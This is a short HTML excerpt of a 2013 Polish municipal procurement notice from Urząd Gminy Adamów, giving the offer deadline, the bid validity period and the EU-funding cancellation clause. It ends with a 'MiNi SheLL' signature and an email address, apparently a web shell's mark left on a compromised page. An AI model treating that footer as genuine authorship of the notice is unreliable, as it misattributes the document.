<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2013 godzina 13:00, miejsce: Urząd Gminy Adamów, Adamów 11 b, 22-442 Adamów -pokój Nr 4 Sekretariat zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com